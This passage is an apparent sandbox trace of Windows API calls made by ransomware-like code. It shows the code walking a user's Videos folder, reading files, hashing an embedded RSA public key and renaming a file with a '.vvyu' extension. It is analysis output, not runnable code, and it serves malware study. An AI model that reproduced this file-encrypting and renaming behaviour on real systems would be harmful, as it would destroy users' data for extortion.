lpNumberOfBytesWritten=0x2f9fb50*=0x26, lpOverlapped=0x0) returned 1 [0198.387] CloseHandle (hObject=0x584) returned 1 [0198.389] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2adfe08 [0198.389] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x890) returned 0x2af3f88 [0198.389] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adfe08 | out: hHeap=0x2c0000) returned 1 [0198.389] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Videos\\FPzctgqI5yS\\M fZX23r02sYWxh\\BTrak.swf" (normalized: "c:\\users\\keecfmwgj\\videos\\fpzctgqi5ys\\m fzx23r02sywxh\\btrak.swf"), lpNewFileName="C:\\Users\\kEecfMwgj\\Videos\\FPzctgqI5yS\\M fZX23r02sYWxh\\BTrak.swf.vvyu" (normalized: "c:\\users\\keecfmwgj\\videos\\fpzctgqi5ys\\m fzx23r02sywxh\\btrak.swf.vvyu")) returned 1 [0198.401] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0198.402] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0198.402] VirtualFree (lpAddress=0x2620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0198.405] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29edcf8 | out: hHeap=0x2c0000) returned 1 [0198.405] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x435a34f0, ftCreationTime.dwHighDateTime=0x1d89ec9, ftLastAccessTime.dwLowDateTime=0x34fed7a0, ftLastAccessTime.dwHighDateTime=0x1d8a45d, ftLastWriteTime.dwLowDateTime=0x34fed7a0, ftLastWriteTime.dwHighDateTime=0x1d8a45d, nFileSizeHigh=0x0, nFileSizeLow=0x49bc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="DyXmYMfEW2zZ74G.avi", cAlternateFileName="DYXMYM~1.AVI")) returned 1 [0198.405] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0198.405] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa6) returned 0x29edcf8 [0198.405] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0198.405] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Videos\\FPzctgqI5yS\\M fZX23r02sYWxh\\DyXmYMfEW2zZ74G.avi") returned=".avi" [0198.405] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Videos\\FPzctgqI5yS\\M fZX23r02sYWxh\\DyXmYMfEW2zZ74G.avi" (normalized: "c:\\users\\keecfmwgj\\videos\\fpzctgqi5ys\\m fzx23r02sywxh\\dyxmymfew2zz74g.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0198.406] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x2f9fb40 | out: lpFileSize=0x2f9fb40*=18876) returned 1 [0198.406] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2620000 [0198.410] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x4996, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0198.410] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x2f9fb78, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb78*=0x26, lpOverlapped=0x0) returned 1 [0198.412] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0198.412] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0198.412] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0198.413] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x2f9fb70, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb70*=0x49bc, lpOverlapped=0x0) returned 1 [0198.413] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0198.414] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f1) returned 0x2a7d6f0 [0198.414] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0198.414] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0198.414] CryptAcquireContextW (in: phProv=0x2f9fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2f9fa50*=0x31b8e8) returned 1 [0198.415] CryptCreateHash (in: hProv=0x31b8e8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2f9fa58 | out: phHash=0x2f9fa58) returned 1 [0198.415] CryptHashData (hHash=0x2a05de8, pbData=0x2a7d6f0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0198.415] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x0, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x2f9fa54) returned 1 [0198.415] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x2a26b08 [0198.415] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x2a26b08, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x2a26b08, pdwDataLen=0x2f9fa54) returned 1 [0198.415] GetLastError () returned 0x0 [0198.415] CryptDestroyHash (hHash=0x2a05de8) returned 1 [0198.415] CryptReleaseContext (hProv=0x31b8e8, dwFlags=0x0) returned 1 [0198.416] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0198.416] UuidCreate (in: Uuid=0x2f9fa48 | out: Uuid=0x2f9fa48) returned 0x0 [0198.416] UuidToStringA (in: Uuid=0x2f9fa48, StringUuid=0x2f9fa40 | out: StringUuid=0x2f9fa40) returned 0x0 [0198.416] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0198.416] RpcStringFreeA (in: String=0x2f9fa40 | out: String=0x2f9fa40) returned 0x0 [0198.416] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0198.416] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0198.416] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x49c0) returned 0x2af7168 [0198.416] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0198.416] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0198.416] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2a7d6f0 [0198.416] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0198.416] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2af3f88 [0198.417] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9ed0 [0198.417] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2aeaba8 [0198.417] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae68c0 [0198.417] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2aeabf0 [0198.417] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae68d8 [0198.417] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6908 [0198.417] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6968 [0198.417] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6920 [0198.417] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x2a06f58 [0198.417] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x2aebfa0 [0198.417] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2aebfa0, Size=0x218) returned 0x2aedfa0 [0198.417] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x2af4180 [0198.417] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6908 | out: hHeap=0x2c0000) returned 1 [0198.417] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6920 | out: hHeap=0x2c0000) returned 1 [0198.417] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6968 | out: hHeap=0x2c0000) returned 1 [0198.418] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a06f58 | out: hHeap=0x2c0000) returned 1 [0198.418] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af4180 | out: hHeap=0x2c0000) returned 1 [0198.418] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6968 [0198.418] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7db0 [0198.418] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6920 [0198.418] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ac8 [0198.418] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x2ae6908 [0198.418] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7da0 [0198.418] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x2f5b18 [0198.418] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7a40 [0198.418] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f30 [0198.418] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26b08 [0198.419] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x2a19588 [0198.419] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26ae8 [0198.419] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0198.419] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0198.419] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6920 | out: hHeap=0x2c0000) returned 1 [0198.419] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0198.419] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6908 | out: hHeap=0x2c0000) returned 1 [0198.419] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0198.419] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0198.419] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6968 | out: hHeap=0x2c0000) returned 1 [0198.420] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7a40 | out: hHeap=0x2c0000) returned 1 [0198.420] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9ed0 | out: hHeap=0x2c0000) returned 1 [0198.421] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aedfa0 | out: hHeap=0x2c0000) returned 1 [0198.421] GetCurrentThreadId () returned 0x5d8 [0198.421] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae00c8 [0198.421] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x2af5330 [0198.421] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x2a42548 [0198.421] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b8e8 [0198.421] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x2ae2eb8 [0198.421] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0198.421] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0198.421] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae01d0 [0198.421] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0198.422] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0198.422] GetCurrentThreadId () returned 0x5d8 [0198.422] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0198.423] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0198.423] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x2f5b18 [0198.423] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0198.423] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0198.423] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0198.424] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0198.424] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0198.424] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae02d8 [0198.424] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0198.424] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x2a40528 [0198.424] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0198.424] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae04e8 [0198.424] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0198.424] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6968 [0198.424] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0198.424] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0198.424] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e00 [0198.424] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e10 [0198.424] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e20 [0198.424] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0198.425] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0198.425] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0198.425] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6908 [0198.425] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0198.425] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e00 [0198.425] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0198.425] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0198.425] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e60 [0198.425] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e70 [0198.425] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e80 [0198.425] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6920 [0198.425] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e70 | out: hHeap=0x2c0000) returned 1 [0198.425] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ac8 [0198.425] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e60 | out: hHeap=0x2c0000) returned 1 [0198.425] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae68f0 [0198.425] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e80 | out: hHeap=0x2c0000) returned 1 [0198.425] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6980 [0198.425] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0198.425] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7de0 [0198.425] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0198.425] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6950 [0198.426] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0198.426] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6938 [0198.426] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0198.426] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6998 [0198.426] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6938 | out: hHeap=0x2c0000) returned 1 [0198.426] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6938 [0198.426] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6950 | out: hHeap=0x2c0000) returned 1 [0198.426] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e10 [0198.426] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0198.426] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26aa8 [0198.426] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0198.426] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x2ad7a40 [0198.426] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6908 | out: hHeap=0x2c0000) returned 1 [0198.426] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6908 [0198.426] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0198.426] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x2af4180 [0198.426] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6968 | out: hHeap=0x2c0000) returned 1 [0198.426] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a197b8 [0198.426] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6998 | out: hHeap=0x2c0000) returned 1 [0198.426] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x2af4390 [0198.427] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7a40 | out: hHeap=0x2c0000) returned 1 [0198.427] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x2f5b18 [0198.427] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0198.427] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a198d0 [0198.427] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6908 | out: hHeap=0x2c0000) returned 1 [0198.427] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x2af45a8 [0198.427] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a197b8 | out: hHeap=0x2c0000) returned 1 [0198.427] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2adffc0 [0198.427] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0198.428] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b8e8 | out: hHeap=0x2c0000) returned 1 [0198.428] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae02d8 | out: hHeap=0x2c0000) returned 1 [0198.428] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adffc0 | out: hHeap=0x2c0000) returned 1 [0198.428] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26aa8 | out: hHeap=0x2c0000) returned 1 [0198.429] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a198d0 | out: hHeap=0x2c0000) returned 1 [0198.429] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af4390 | out: hHeap=0x2c0000) returned 1 [0198.429] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af45a8 | out: hHeap=0x2c0000) returned 1 [0198.430] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0198.430] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0198.430] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6938 | out: hHeap=0x2c0000) returned 1 [0198.430] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0198.430] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6980 | out: hHeap=0x2c0000) returned 1 [0198.430] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0198.430] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6920 | out: hHeap=0x2c0000) returned 1 [0198.430] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae68f0 | out: hHeap=0x2c0000) returned 1 [0198.430] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2eb8 | out: hHeap=0x2c0000) returned 1 [0198.431] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42548 | out: hHeap=0x2c0000) returned 1 [0198.431] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae01d0 | out: hHeap=0x2c0000) returned 1 [0198.431] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae68d8 | out: hHeap=0x2c0000) returned 1 [0198.431] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aeabf0 | out: hHeap=0x2c0000) returned 1 [0198.431] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af4180 | out: hHeap=0x2c0000) returned 1 [0198.432] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae04e8 | out: hHeap=0x2c0000) returned 1 [0198.432] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40528 | out: hHeap=0x2c0000) returned 1 [0198.432] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a19588 | out: hHeap=0x2c0000) returned 1 [0198.432] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0198.432] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0198.432] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0198.433] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f30 | out: hHeap=0x2c0000) returned 1 [0198.433] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0198.433] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0198.434] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: 